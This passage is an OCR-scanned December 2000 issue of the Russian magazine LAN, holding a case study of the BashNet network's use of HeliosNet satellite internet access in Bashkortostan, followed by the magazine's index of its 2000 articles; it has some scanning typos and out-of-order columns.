отечественных. Традиционные ниши
спутникового доступа в Internet — под-
всех сколь-либо значимых населенных
пунктов республики в рамках единой се-
ти (с последующей ее эксплуатацией).
Задача эта требовала использования
имеющихся канальных ресурсов, т. е. в
массе своей — каналов ТЧ. При участии
компании Race Communications был ре-
ализован проект национальной сети
«БашНет», в рамках которого требуе-
мых результатов удалось достичь при
помощи мультисервисных технологий,
реализованных в маршрутизаторах
Motorola Vanguard. В основе одной из
самых первых в стране сетей с интегра-
цией услуг лежали каналы frame relay и
Х.25. Естественно, пропускная способ-
ность каналов измерялась всего лишь
несколькими десятками килобит в се-
кунду, а на периферии сети некрупные
населенные пункты подключались по
каналам 24 Кбит/с. Но тем не менее ос-
новная задача была решена. Клиентами
сети стали все основные структуры рес-
публики, и, соответственно, они получи-
ли возможность использовать ее преи-
мущества в своей работе.
Не стоит, однако, считать, что сеть
создавалась только в целях решения
технических проблем, возникающих в
процессе работы официальных струк-
тур республики. Достаточно много уси-
лий было приложено к формированию
ключение жилых домов, корпоратив-
ных клиентов, абонентов систем спут-
никового телевидения и обеспечение
относительно высокой пропускной спо-
собностью небольших провайдеров. Все
это, образно говоря, можно назвать «то-
чечным» применением. Однако, как по-
казывает практика, спутниковый дос-
туп в Internet может быть внедрен в до-
статочно широких масштабах — приме-
нительно к сегодняшнему выпуску руб-
рики — в масштабах субъекта федера-
ции. Причем это решение предоставля-
ет выход из весьма непростой ситуации.
ТЕЛЕКОММУНИКАЦИИ — В МАССЫ
Хотя последствия так называемого гло-
бального телекоммуникационного бума
ощущаются в России гораздо слабее,
чем во всем мире, тем не менее налицо
определенный подъем в этой области.
Динамика развития данной отрасли в
нашей стране обуславливается понима-
нием того, что наличие собственной те-
лекоммуникационной инфраструктуры
во всех отношениях укрепляет позиции
ее хозяев — будь то частные компании
или государственные структуры.
В Башкортостане идею создания еди-
ной телекоммуникационной инфрастру-
ктуры региона начали воплощать в
жизнь еще до того, как термин «телеком-
муникационный бум» превратился в
расхожий журналистский штамп. Около
пяти лет назад в республике было созда-
но предприятие «ИКЦ «Экспресс», при-
званное решить задачу объединения
96 LAN/Журнал сетевых решений
> ПОУЧИТЕЛЬНЫЙ ПРИМЕР:
среди населения спроса на услуги пере-
дачи данных, т. е. Internet. Во-первых,
практически на каждом узле связи бы-
ли созданы так называемые пункты
коллективного доступа, представляв-
шие собой помещения с парой компью-
теров, подключенных к Internet. Любой
желающий за некоторую плату мог на
практике узнать, что такое Internet, а
при наличии достаточных познаний из-
влечь из предлагаемой услуги опреде-
ленную пользу. Во-вторых, в практику
«БашНет» вошло проведение регуляр-
ных конференций/се.минаров в насе-
ленных пунктах, где есть возможность
пользоваться услугами сети. Целью
конференций была ломка стереотипа,
гласящего, что на периферии нет и не
может быть реального спроса па услуги
Internet, и соответственно пет смысла
развивать там данное направление.
Этот стереотип неверен хотя бы пото-
му, что даже в небольшом населенном
пункте есть своя местная «элита», кото-
рая после соответствующей демонстра-
ции возможностей Internet с охотой
воспринимает данное новшество. Та-
ким образом, там уже может бы ть сфор-
мирована начальная база клиентов. По-
добные мероприятия охватывают даже
самые отдаленные поселки, так что все
предпосылки для продвижения услуг
Internet в массы были созданы.
ПОМОЩЬ С НЕБЕС
Сформировать спрос — это полдела, его
надо еще и удовлетворить. Последнее
оказалось сделать не так-то просто. Как
мы уже отмечали, в каждом населенном
пункте, где есть точка присутствия сети,
имеется несколько организаций, кото-
рые являются основными потребителя-
ми ее услуг — это местное отделение
Сбербанка, государственные структуры
и т. и. Даже при самом эффективном ис-
пользовании канала добавить к этим
потребителям ресурсов сети еще не-
скольких весьма затруднительно. Хотя
по окончании рабочего дня названные
структуры практически не задействуют
свои каналы, все равно реальным оказа-
лось подключение не более двух-трех
частных пользователей. Выход из соз-
давшейся ситуации нашелся в органи-
зации спутникового доступа в Internet.
Напомним, что основной принцип
работы систем спутникового доступа со-
стоит в следующем: запрос поступает к
провайдеру по наземным линиям через
коммутируемый доступ, а сам трафик
Internet к клиен ту — через систему спут-
никового доступа. В силу того, что тра-
фик Internet в большинстве своем асим-
метричен, т. е. пользователь получает
намного больший объем данных, чем ге-
нерирует (за исключением, быть может,
игр по сети и отправки больших файлов
по ftp или электронной почте), для пере-
дачи запросов могут применяться низ-
коскоростные каналы, а из «космоса»
пользователь получает трафик с боль-
шой скоростью. Соответственно, орга-
низация узлов доступа через спутнико-
вую систему позволяет решить пробле-
му пропускной способности.
В данном случае была задействова-
на система спутникового доступа
HeliosNet. Выбор этой системы был не в
последнюю очередь обусловлен ее оте-
чественным происхождением. Во-пер-
вых, в силу того, что доля внутрирос-
сийского трафика Internet сегодня уже
превышает долю трафика от запросов к
зарубежным сайтам, наличие «прямого»
выхода в зарубежный сегмент уже не я в-
ляется преимуществом. Во-вторых, раз-
работанный специалистами компании
«Рсппорт» (оператора сети HeliosNet)
комплект оборудования обладал весьма
удачным соотношением «цена/качест-
во». что при перспективе массового вне-
дрения и определенных ограничениях
имело немаловажное значение. В-треть-
их, не последнюю роль сьпрало то об-
стоятельство, что оператор предлагает
услуги удаленного мониторинга узлов
спутникового доступа, так как в услови-
ях масштабного внедрения это упроща-
ло работу па местах.
Стандартная схема работы узла дос-
тупа такова (см. Рисунок 1) — сервер
удаленного доступа подключается к
разработанному на базе ПК компанией
«Реппорт» маршрутизатору спутнико-
вого доступа. Абоненты связываются
по коммутируемым линиям с сервером
доступа, и их запросы передаются на
спутниковый маршрутизатор. Тот в
свою очередь перенаправляет запросы
абонентов в Уфу, откуда они приходят
в центр HeliosNet. Соответственно от-
клик па запрос поступает через спутни-
ковую антенну на маршрутизатор, а от-
туда — через центр удаленного доступа
абонентам. Такая схема позволяет уве-
личить емкость узла доступа в несколь-
В двух словах:
«ИКЦ «Экспресс» («БашНет»)
Факты Сеть «БашНет» охватывает все рай-
оны Башкортостана, включая весьма отдален-
ные населенные пункты республики. В инф-
раструктуре этой созданной достаточно давно
сети используются низкоскоростные каналы
(особенно на периферии). Тем не менее, бла-
годаря изначальному применению мульти-
сервисных технологий, ресурсов сети хватает
для решения основных задач. На большей ча-
сти территории республики сеть уже сущест-
вует, что создает необходимые предпосылки
для предоставления услуг Internet населению
даже самых отдаленных районов.
Задача. Более-менее массовое внедрение ус-
луг Internet требовало решения проблемы про-
пускной способности, так как имеющиеся кана-
лы имели ограниченную пропускную способ-
ность. Емкость каналов использовалась с мак-
симальным КПД в рабочие часы, но и в ночное
время полной пропускной способности было
достаточно для полноценной работы не более
чем двух-трех человек. Требовалось найти ре-
шение, позволяющее обойтись без модерниза-
ции существующей канальной структуры.
Решение. Выходом из создавшейся ситуации
стало использование системы спутникового
доступа в Internet. Местные узлы связи были
подключены к системе HeliosNet. Благодаря
асимметричной структуре трафика в системе
спутникового доступа наземные каналы за-
действуются только для передачи запросов
от пользователей, что позволило увеличить
потенциальную клиентскую емкость местных
узлов доступа в несколько раз.
Выводы. Системы спутникового доступа мо-
гут быть хорошим средством продвижения ус-
луг доступа в Internet в населенных пунктах,
где скоростные каналы связи отсутствуют, а
модернизация существующих каналов нежела-
тельна вследствие сомнительной рентабель-
ности. Кроме того, даже в случае повышения
емкости каналов и, следовательно, заметного
уменьшения необходимости в альтернативных
коммутируемому методах доступа в Internet,
спутниковые системы доступа «переквалифи-
цируются» в решение другого уровня, т. е. ин-
вестиции не будут потеряны. LAN
ко раз. Поскольку соотношение прямо-
го и обратного трафика составляет в
среднем 1:10, для обеспечения нормаль-
ной работы на скорости соединения
19,9 Кбит/с требуется наземный канал
не более 2 Кбит/с. Учитывая то, что за-
> http://www.lanmag.ru
Декабрь 2000 97
> ПОУЧИТЕЛЬНЫЙ ПРИМЕР:
Рисунок 1. Схема организации модернизиро-
ванного узла доступа.
просы уходят не одновременно и не
требуют выделенной пропускной спо-
собности, «окна» в 4 Кбит/с оказывает-
ся достаточно для обслуживания уже
не 2-3, а 6—12 пользователей. В ночное
время нормально работать могут уже
около го клиентов. Для расширения
возможностей подключения новых
клиентов предусматривается установка
дополнительных маршрутизаторов се-
рии Cisco 26ХХ с 8—16 аналоговыми
модемами для абонентского доступа.
В настоящее время в опытном режи-
ме эксплуатируются шесть узлов связи,
а по окончании периода тестовой экс-
плуатации планируется н.ачать их мас-
совое внедрение. В опытном режиме
производится и некоторая модерниза-
ция станций спутникового доступа,
точнее, их программного обеспечения.
Благодаря этому уже пользующиеся
коммутируемым доступом абоненты
сети не должны будут перенастраивать
параметры своих браузеров и ПК после
модернизации узла. Проблема биллин-
га решается параллельно, поскольку
сочетание двух типов каналов — одного
с оплатой по времени, а другого с опла-
той за трафик — требует продуманного
подхода. С технической точки зрения
тарификация абонентов, работающих
по наземным дуплексным каналам,
производится обычным способом через
SNMP на маршрутизаторах (в случае
выделенных линий) и посредством сер-
вера RADIUS (в случае коммутируе-
мых каналов). Учет трафика, перека-
чанного по спутниковому каналу связи,
ведется на локальных ргоху-ссрверах
узлов, а также в Центре управления
HeliosNet (на спутниковом шлюзе).
Стоит также отметить, что, даже ко-
гда в более-менее отдаленном будущем
пропускная способность сети сущест-
венно увеличится (это представляется, в
общем-то, неизбежным), имеющееся на
местах оборудование спутникового дос-
тупа не станет ненужным. Потребность в
расширении емкости каналов может
быть обусловлена только массовым
спросом, что подразумевает и изменение
его структуры. Спутниковый доступ в
таком случае займет нишу высокоскоро-
стного подключения отдельных органи-
заций, лиц или групп пользователей. Со-
ответственно инвестиции в приобретен-
ное оборудование не пропадут даром.
ЗАКЛЮЧЕНИЕ
Если говорить о сетях масштаба субъе-
кта федерации вообще, то опыт «Баш-
Нет» вряд ли найдет широкое примене-
ние, поскольку на таком уровне вопрос
пропускной способности обычно реша-
ется с помощью модернизации каналов
связи (как правило, путем прокладки
волоконно-оптических линий). Но
субъект федерации — это самая круп-
ная (если не учитывать недавно создан-
ные округа) территориальная единица
РФ, в которую входят, например, рай-
оны. С точки зрения плотности населе-
5-я межрегиональная
выставка
Информацией
ния Башкортостан сравним с районом в
более заселенном регионе. Более того,
на уровне районов вопросы повышения
пропускной способности каналов ре-
шить уже не так просто. К тому же на
периферии рынок услуг Internet разви-
вать гораздо сложнее (по сравнению с
областным центром). С этих позиций
опыт «БашНет» представляется весьма
актуальным, причем не только его тех-
ническая сторона. Сам подход к про-
движению услуг Internet на территории
республики и развитию этого рынка за-
служивает внимания, поскольку имен-
но он в сочетании с соответствующими
техническими решениями дает желае-
мые результаты. Кроме того, в некото-
рых областях, в частности в Подмоско-
вье, получила распространение практи-
ка частотного уплотнения телефонных
линий. Абоненты, подключенные к уп-
лотненным каналам, лишены возмож-
ности использовать коммутируемый
доступ в Internet, поскольку модемная
связь в таких условиях осуществляется
только на самых низких скоростях — не
более чем 2400 Кбит/с (если соедине-
ние вообще удается установить). В та-
кой ситуации спутниковый доступ в
Internet тоже может помочь.
Александр Авдуевский — обозреватель
LAN. С ним можно связаться по адресу:
shura@lanmag.ru.
Организаторы:Выставочный центр “Софит-Экспо"и СГТПП РФ
Тел/факс: (8452)72-58-85, 26-92-25, 26-46-71,26-92-49
E-mail:offce@expo.soflt.ru http://www.sofit.ni/expo
компьютерное оборудование
и периферия
программное обеспечение
информационные технологии
сетевые технологии
средства мультимедиа
оргтехника
офисные принадлежности
ОТКРЫТЫЕ
СИСТЕМЫ
Open Syttemt РыЫклйоял
98 LAN/Журнал сетевых решений
> ПУТЕВОДИТЕЛЬ ПО СТАТЬЯМ
Статьи, опубликованные журналом LAN в 2000 году
> ГЛОБАЛЬНЫЕ СЕТИ Полностью оптические сети Апрель, стр. 20
MPLS: лиха беда начало С помощью MPLS Internet, может быть, наконец-то будет спо- собен транспортировать все виды графика - от пакетных дан- ных до чувствительных к задержке речи и видео. Питер Эшвуд-Смит, Билель Джамаусси и Дон Федик Январь, стр. 80 Бескрайний мир беспроводной связи Международный рынок беспроводной связи изобилует множе- ством систем и стандартов — от AMPS до IMT-2000. Гилберт Хелд Февраль, стр. 59 Терабитные маршрутизаторы: поучительная путаница Предоставление IP-сервисов следующего поколения требует применения маршрутизации следующего поколения. Подходят ли па эту роль терабитные маршрутизаторы? Дэвид Гринфилд Апрель, стр. 87 Платные полосы на информационной супермагистрали Представляют ли частные соединения между крупнейшими провайдерами угрозу статусу Internet как новой общедоступ- ной сети? Джонатан Эйнджел Май, стр. 59 Вокруг SLA Стоят ли соглашения об уровне сервиса выставляемых за них счетов? В этой статье мы рассмотрим, кто предлагает SLA, что они предусматривают и как пользователи их оценивают. Элизабет Кларк Июнь, стр. 106 Искусство равновесия При тщательном проектировании современные многоканаль- ные технологии позволяют эффективно сочетать резервные со- единения с объединением каналов. Тоби Джессап Июль-Август, стр. 65 Кэширование и доставка информационного наполнения Web тоже когда-то была клиент-сервисным приложением, а те- перь, благодаря систематической предварительной загрузке в кэш, Всемирная Паутина превращается в распределенную ши- роковещательную сеть. Джонатан Эйнджел Июль-Август, стр. 72 Все государственное регулирование Реальная отмена государственного регулирования так и остается весьма отдаленной перспективой. Энди Дорнан Октябрь, стр. 78 Ethernet выходит в глобальные сети Стандарт 10 Gigabit Ethernet обещает предложить нечто боль- шее, чем простое увеличение пропускной способности, но смо- жет ли он этого добиться? Энди Дорнан Ноябрь, стр. 52 Кабельные модемы Май, стр. 20 Массивы RAID июнь, стр. 19 Стандарт GSM Июль-Август, стр. 18 Пакетный радиосервис сентябрь, стр. 18 ADSL И SDSL Октябрь, стр. 21 CDMA Ноябрь, стр. 23 Протоколы Медасо И MGCP Декабрь, стр. 18 >ИНСТРУМЕНТАРИЙ Монтаж И демонтаж микросхем Январь, стр. 26 Измерительные приборы Февраль, стр. 59 Мультиметры март, стр. 28 Осциллографы Апрель, стр. 30 Приборы для ремонта компьютеров и оргтехники Май, стр. 30 Электроинструмент июнь, стр. 28 Что необходимо для внедрения xDSL? июль-Август. стр. 26 Измерительный инструмент Сентябрь, стр. 28 Приборы ДЛЯ телекоммуникаций Октябрь, стр. 32 Технологии крепления кабельных линий СКС Ноябрь, стр. зо Укладка кабеля Декабрь, стр. 26 >ИНТЕРВЬЮ Ласло Вайда, региональный менеджер по странам СНГ и Венгрии, Brand-Rex январь, стр. io Леонид Городцов, глава представительства в России и странах СНГ, F.G. Wilson Февраль, стр. ю Арина Корнильева, менеджер по маркетингу Подразделения Телекоммуникаций, Corning Март. стр. 12 Владимир Липпинг, глава представительства в странах СНГ и Балтии, D-Link Апрель, стр. 12 Галина Смирнова, генеральный директор представительства в России, Agilent Technologies май, стр. 12 Дарюш Заенц, директор представительства в России и СНГ, Mod-Tap июнь, стр. ю Дмитрий Соколов, глава представительства в России и СНГ, Cabletron Systems июль-Август, стр. ю Дмитрий Иванников, генеральный директор представитель- ства в России и СНГ, Avaya Communication Сентябрь, стр. ю Дмитрий Каменский, генеральный директор в России и СНГ, Lucent Technologies Октябрь, стр. ю
Как работает FC-AL Январь, стр. 19 Сеть устройств хранения Февраль, стр. 19 Мультиплексирование по длине волны март, стр. 21 Максим Иванов, менеджер по развитию бизнеса В ВОСТОЧНОЙ Европе, OrtroniCS Ноябрь, стр. 14 Виталий Фридлянд, глава представительства в странах СНГ, ЗСот декабрь, стр. 12
> http://www.lanmag.ru Декабрь 2000 99
> ПУТЕВОДИТЕЛЬ ПО СТАТЬЯМ
> КАБЕЛЬНЫЕ СИСТЕМЫ
Четырехпарная проводка для Gigabit Ethernet
В июне 1999 г. окончательно принят стандарт 802.33b Gigabit
Ethernet loooBaseT. Какие же кабельные системы будут соот-
ветствовать этому стандарту?
Давид Гальперович Январь, стр. 45
СКС вне офиса
Кабельные системы для зданий не офисного типа, сектора
SOI 10 и домашних сетей.
Андрей Семенов Февраль, стр. 43
Световоды для оптических кабелей СКС
Виды оптических волокон и кабелей, используемых в локаль-
ных сетях.
Андрей Семенов Март, стр. 81
Разъемы типа 110 для трактов СКС Категории 6
Разъемы типа по на базе нетрадиционных схем для применения
в СКС с повышенной пропускной способностью и коммутаци-
онное оборудование на их основе.
Андрей Семенов Апрель, стр. 65
Для чего кабелю экран?
Проблема применения экранированных кабелей всеете не име-
ет однозначного решения.
Давид Гальперович Май, стр. 71
Словарь-справочник по структурированным
кабельным системам
Давид Гальперович Май. стр. 77
Я б в монтажники пошел...
Серьезная работа на рынке кабельных систем подразумевает
обязательное обучение персонала и сертификацию компаний.
Александр Авдуевский Июнь, стр. 61
Оптические инсталляционные устройства
Оборудование локальной, сети с волоконно-оптическим интер-
фейсом для применения в составе СКС.
Андрей Семенов Июль-Август, стр. 47
Запас по характеристикам
Рекомендации относительно кабельной проводки для Ethernet
iooBaseTX и toooBaseT.
Дэн Кеннефик Сентябрь, стр. 54
Неинсталляционное оборудование СКС
Специализированное оборудование неинсталляциоппого типа
для локальных сетей с волоконно-оптическими интерфейсами
для применения в составе СКС.
Андрей Семенов Октябрь, стр. 55
Телевизионная проводка
Современная телевизионная проводка позволяет осуществить
компьютерное управление службами здания и скоростной дос-
туп в Internet.
Давид Гальперович Октябрь, стр. 64
Монтаж оптических разъемов
Технологии установки разъемов при построении волоконно-оп-
тической подсистемы СКС.
Андрей Семенов Ноябрь, стр. 59
Контракт на тестирование СК
Требования но обследованию, тестированию и приемочно-
му контролю структурированных кабельных систем внутри
зданий.
Марк Джонстон Декабрь, стр. 63
Контракт на тестирование оптической системы
Требования но обследованию, тестированию и приемочному
контролю волоконно-оптических кабельных систем внутри
зданий.
Марк Джонстон Декабрь, стр. 69
> КОРПОРАТИВНЫЕ СЕТИ
Заводи мотор
Дизель-генераторы как часть систем гарантированного электро-
питания.
Александр Авдуевский Январь, стр. 72
Когда разразится катастрофа
Пожар или потоп, сеть должна продолжать работать. Каково
наилучшее решение для восстановления после аварии?
Майкл Гурвиц Февраль, стр. 65
Gigabit Ethernet по меди: отчет об успехах
Теперь, когда стандарт на юооВаяеТ принят, для его широкомас-
штабного внедрения требуется устранить некоторые препятствия.
Элизабет Кларк Март, стр. 74
Построение надежной защиты с помощью Linux
ОС Linux все чаще рассматривается как жизнеспособная альтер-
натива решениям с помощью защиты на базе «закрытых систем».
Рамон Дж. Онтаньон Апрель, стр. 97
Стоимость владения тонкими клиентами
Применение тонких клиентов позволяет снизить стоимость на-
стольных вычислений на 75%. Однако для этого аппаратное и
программное обеспечение серверов придется существенно мо-
дернизировать.
Джонатан Эйнджел Май, стр. 52
Proxy-серверы
Proxy-серверы выполняют две основные функции — посредни-
ка и кэша.
Джонатан Эйнджел Июнь, стр. 111
Обоснование модернизации сети
Аналитические данные помогают обосновать необходимость модер-
низации сети при ее низкой производительности, но перспектива
достижения новых бизнес-целей способствует этому еще больше.
Бартон МакКинли Июль-Август, стр. 59
По стойке «смирно»
Компактные серверы высотой 1U и 2II обладают огромной мощ-
ностью и могут втиснуться даже в переполненные стойки
в центрах обработки данных.
Джонатан Эйнджел Сентябрь, стр. 75
На штурм вычислительного центра
Windows 2000 Datacenter Edition может работать на весьма
серьезном «железе».
Джонатан Эйнджел Октябрь, стр. 49
100 LAN/Журнал сетевых решений
> ПУТЕВОДИТЕЛЬ ПО СТАТЬЯМ
PKI за семью печатями
Реализация PKI требует принятия Строгих мер защиты для
обеспечения ее целостности и полезности. Тому, как этого до-
биться, и посвящена данная статья.
Рамон Дж. Онтаньон Ноябрь, стр. 105
Технологии стековых коммутаторов
Сравнительный анализ используемых технологий для объеди-
нения коммутаторов в стек.
Александр Гусак Декабрь, стр. 49
> ЛОКАЛЬНЫЕ СЕТИ
ПО для управления производительностью приложений
Несмотря на разногласия по поводу того, что собой представля-
ет эта категория продуктов и что они должны делать, все согла-
шаются с тем, что они необходимы.
Джонатан Эйнджел Июнь. стр. 55
NetWare 5.1: ставка на Internet
Основные особенности новой версии операционной системы
NetWare.
Константин Пьянзин Июль-Август, стр. 85
> НОВЫЕ ТЕХНОЛОГИИ
Настройка барометра пропускной способности
Эффек тивное управление пропускной способностью может ока-
заться поистине спасительным, если оно будет настроено в соот-
ветствии с требованиями сети.
Элизабет Кларк Январь, стр. 66
Защита DNS
Протокол защиты DNS позволит проверить, что запрошенные
адреса Internet поступили от законного источника и что ответ на
запрос содержат аутентичные данные,
Дайана Давидович и Пол Викси Февраль, стр. 88
Оптическая революция
Неограниченная пропускная способность. Предоставление
услуг в реальном времени. Готовы ли вы к новым телекомму-
никациям?
Дэвид Гринфилд Март, стр. 93
Механика управления с помощью правил
Чем управление с помощью правил может помочь в оптимиза-
ции вашей сети? Эта статья представляет собой попытку ответа
на данный вопрос.
Элизабет Кларк Апрель, стр. 59
Свобода передвижения с Windows СЕ
Карманные устройства могут избавить вас от привязки к рабо-
чему столу, но способны ли они обеспечить столь важное соеди-
нение с сетью компании?
Джефри Фритц Май, стр. 97
Перспективы унифицированного обмена сообщениями
Унифицированный обмен сообщениями прочат на роль спаса-
тельного круга для тонущих в морс сообщений пользователей.
Но что он дает в действительности?
Девин Вольф Июнь, стр. 95
Рыночные реалии городских оптических сетей
Распространение оптических сетевых технологий в городских
сетях сводится к одному вопросу цене.
МаркЛутковиц Июль-Август, стр. 110
Новое лицо идентификационных устройств
Благодаря снижению цеп, масштабируемости и совместимости
идентификационные устройства становятся все более привле-
кательными.
Элизабет Кларк Сентябрь, стр. 59
Настройка счетчика SLA
Новые инструментальные средства и стратегии позволяют луч-
ше оценить уровень сервиса традиционных провайдеров и ASP.
Элизабет Кларк Октябрь, стр. 93
Потоковое мультимедиа приходит в бизнес
Больше не принадлежа исключительно потребительском}' рын-
ку, потоковое мультимедиа превращается в эффективный, жиз-
неспособный и потенциально выгодный инструмент бизнеса.
Майкл Гурвиц Ноябрь, стр. 96
xDSL: революция продолжается
Перенесение точки концентрации трафика ближе к абонентам
позволяет решить многие проблемы внедрения технологий DSL.
Сергей Шаронин Декабрь, стр. 82
> ПОУЧИТЕЛЬНЫЙ ПРИМЕР
С высоты плотины
Красноярская ГЭС модернизирует свою телекоммуникацион-
ную инфраструктуру.
Александр Авдуевский Январь, стр. 101
Пять минут, полет нормальный
Центр управления полетами это, прежде всего, большой вы-
числительный комплекс.
Александр Авдуевский Февраль, стр. 101
Камера смотрит в мир
Видеоконференции находят практическое применение в судеб-
ной системе.
Александр Авдуевский Март, стр. 101
Полный вперед!
С построением повой мультимедийной сети стоимостью 2 млрд дол-
ларов, боеготовность военно-морского флота США станет еще выше.
Алан Джон Апрель, стр. 116
Деловой разговор
Национальная сеть передачи данных Республики Беларусь вы-
ходит на новый этап развития.
Александр Авдуевский Май, стр. 117
Сделай сам
Все чаще крупные корпоративные заказчики стремятся созда-
вать собственные локальные телекоммуникационные структуры.
Александр Авдуевский Июнь, стр. 117
Шайбу, шайбу!
Спортивный комплекс как потребитель информационных технологий.
Александр Авдуевский Июль-Август, стр. 117
Кто, кто в теремочке живет...
Виртуальные сети как средство решения организационных проблем.
Александр Авдуевский Сентябрь, стр. 99
> http://www.lanmag.ru
Декабрь 2000 101
> ПУТЕВОДИТЕЛЬ ПО СТАТЬЯМ
Ах, Самара, городок...
Мультисервисные сети завоевывают регионы.
Александр Авдуевский Октябрь, стр. 100
Фонд последней надежды
Информационные решения как часть реформы пенсионной си-
стемы.
Александр Авдуевский Ноябрь, стр. 116
Выход на орбиту
Спутниковый доступ в Internet.
Александр Авдуевский Декабрь, стр. 96
>ПРИЛОЖЕНИЯ
Оптимизация работы приложений в глобальной сети
Знание типов клиент-серверных транзакций должно помочь
создавать сети с максимальной производительностью и доступ-
ностью критически важных приложений.
Рави Равашвами Январь, стр. 94
Парад серверов приложений
Несмотря на неадекватность своего названия, в действительно-
сти ПО серверов приложений представляет собой промежуточ-
ное программное обеспечение двадцать первого века.
Джонатан Эйнджел Февраль, стр. 82
Грядущее пришествие DSML и DEN
Язык разметки службы каталогов способен превратить совмес-
тимость каталогов в реальность.
Дуг Аллен Июль-Август, стр. 105
Создание эффективной системы выявления атак
Скрытые атаки проникают за брандмауэры; бдительные систе-
мы выявления атак позволяют укрепить защиту.
Рамон Дж. Онтаньон Октябрь, стр. 86
Мнгновенный контакт
Нолзователи охотно берут па вооружение немедленный обмен
сообщениями, но администраторы сетей относятся к нему более
осторожно.
Энди Дорнан Ноябрь, стр. 110
> СТРАТЕГИЯ
Сетевая файловая система UNIX
Основные особенности работы файловой системы NFS на плат-
форме UNIX.
Константин Пьянзин Январь, стр. 49
Сетевые технологии для простых смертных
Критические заметки о состоянии рынка сетевого оборудования
в России.
Константин Пьянзин Февраль, стр. 72
Самба — это не только танец
ПО Samba на платформе UNIX способно потеснить Windows NT
как сервер файлов и печати.
Константин Пьянзин Март, стр. 49
Интеграл от синуса
Обеспечение бесперебойного питания как целостная система.
Александр Авдуевский Апрель, стр. 79
102 LAN/Журнал сетевых решений
Впереди новые опасности
Наступление 2000 года обошлось без глобальных потрясений,
но опасность еще не миновала. Полученные уроки должны по-
мочь нам подготовиться к аналогичным ситуациям в будущем.
Энди Дорнан Май, стр. 65
Защита информации по-российски
Казусы российского законодательства и отечественный рынок
средств защиты информации.
Константин Пьянзин Июнь, стр. 81
Новый порядок в сети
От ATM до DSPoP очертания сети XXI века начинают наконец-
то вырисовываться более или менее отчетливо. Однако то, что
становится видно, удивит многих.
Том Нолле Июль-Август, стр. 95
С ветерком
Контроль за климатом в критически важных помещениях.
Александр Авдуевский Сентябрь, стр. 65
Правила игры
Формальные принципы построения и эксплуатации интеллек-
туального здания.
Александр Авдуевский Ноябрь, стр. 89
Лицом к лицу
Видеоконференции находят реальное применение в корпора-
тивных сетях.
Александр Авдуевский Декабрь, стр. 74
> ТЕЛЕФОНИЯ
Голосовые услуги в сети следующего поколения
Как в будущем будут предоставляться голосовые услуги и ка-
ким образом потребуется изменить корпорат ивные сети для их
поддержки?
Тим Краски и Джим МакИчерн Январь, стр. 86
Телефонный счет будущего
Ч тобы не остаться не у дел, провайдерам услуг связи в будущем
придется предоставлять услуги как с установлением, так и без
установления соединения.
Том Нолле Февраль, стр. 52
Встречным курсом
Технологии пакетной телефонии и конвергенции голоса и дан-
ных развиваются и производителями У АТС.
Александр Авдуевский Март, стр. 65
Прием звонков: пожалуйста, ответьте
Как организовать прием звонков, чтобы ни один не остался без ответа.
Джейн Лаино Апрель, стр. 109
Трубка в кармане
Решения DECT для корпоративной телефонии.
Александр Авдуевский Май, стр. 87
Малые АТС: дешево и сердито
Конфигурации и опции: что имеется, как выбрать.
Лайл Дейкслер Июнь, стр. 75
Сокращение задержки голоса по IP
Несколько простых методов позволяют избежать разрыва со-
единения приложениями VoIP в результате задержек в сети.
Гилберт Хелд Июль-Август, стр. 79
> ПУТЕВОДИТЕЛЬ ПО СТАТЬЯМ
Объединение телефонных систем в сеть
Анализ возможностей конвергенции в масштабах предприятия.
Тимоти Джонс Сентябрь, стр. 86
Далекий голос твой
Построение корпоративных телефонных сетей.
Александр Авдуевский Октябрь, стр. 70
Малые АТС с большим потенциалом
Слухи о кончине рынка малых АТС несколько преувеличены:
он жив и процветает.
Уоррен С. Херш Ноябрь, стр. 72
> ЗАЩИТА ИНФОРМАЦИИ
Консалтинг в информационной безопасности
Критерии выбора консалтинговой компании для анализа защи-
ты информационной системы.
Юрий Самохин. Дмитрий Шепелявый Ноябрь, стр. 81
Атака на Windows NT
Несмотря на внутренне непротиворечивую модель безопасно-
сти ошибки реализации привели к появлению слабостей в сис-
теме безопасности ОС Windows NT, в том числе и в ее послед-
ней версии Windows 2000.
Крис Касперски Декабрь, стр. 88
> ТЕМА НОМЕРА
Защита от мобильного кода
Браузеры Web скандально известны своей слабой защитой. Мо-
бильный код несет реальную опасность, и решения этой пробле-
мы далеко не всегда очевидны.
Джонатан Эйнджел Январь, стр. 28
Затяжной прыжок
С одной стороны, будущее мобильного кода выглядит как под-
вижная мишень, с другой — оно во многом зависит от обеспече-
ния требований защиты.
Роберт Ричардсон Январь, стр. 34
Мобильный код: обращаться осторожно!
Мобильный код слишком полезен, чтобы отказаться от него, но
он слишком опасен, чтобы его можно было оставить без внима-
ния. С помощью следующих стратегий вы сможете держать
ситуацию иод контролем.
Дэн Блачарски Январь, стр. 40
Позвони мне по IP
IP-телефония в зеркале времени.
Александр Авдуевский Февраль, стр. 28
Обзор новинок коммуникационных серверов
Традиционные УАТС вряд ли выйдут из употребления в обоз-
римом будущем, но растущее число альтернативных подходов
привлекает все больше сторонников.
Элизабет Кларк Февраль, стр. 36
Какова реальная угроза хакеров вашей сети?
Каковы признаки серьезной информационной атаки и как защи-
титься от таких атак?
Рамон Дж. Онтаньон Март, стр. 30
> http://www.lanmag.ru
Корпоративное антивирусное программное обеспечение
Если Африка и Китай — зоны повышенного риска заражения
биологическими вирусами, то предприятия — не менее опасные
зоны распространения цифровой инфекции.
Роберт Ричардсон Март. стр. 36
Защита чужими руками
Наилучший способ информационный защиты — отдать ключи
от своей сети сторонним специалистам в этой области?
Дэн Блачарски Март. стр. 42
Резервное копирование как средство выживания
Возможности программного обеспечения резервного копирова-
ния и архивирования.
Константин Пьянзин Апрель, стр. 32
Аппаратные средства резервирования
Состояние рынка аппаратных средств резервного копирования
и архивирования.
Константин Пьянзин Апрель, стр. 42
Распределенное тиражирование данных
Распределенное тиражирование может оказаться наилучшим
способом резервного копирования находящихся в разных мес-
тах файлов и повышения эффективности работы сети.
Джерри Голик Апрель, стр. 50
DSL: благословение или проклятие?
Скорость DSL — это благо, но трудности реализации способны
вывести из себя любого. В этой статье мы рассмотрим связан-
ные с этим основные проблемы.
Рэнди Свитт Май, стр. 32
Под знаком DSL
Альтернативные операторы развертывают услуги DSL по всему
миру. Насколько обоснованы их надежды на то, что с помощью
DSL они смогут вывести рынок услуг местной связи из-под кон-
троля традиционных операторов?
Дэвид Гринфилд Май, стр. 38
Что необходимо для передачи голоса по DSL?
Голос по DSL — еще достаточно сырая технология, но она быст-
ро совершенствуется. В этой статье мы рассмотрим, что она мо-
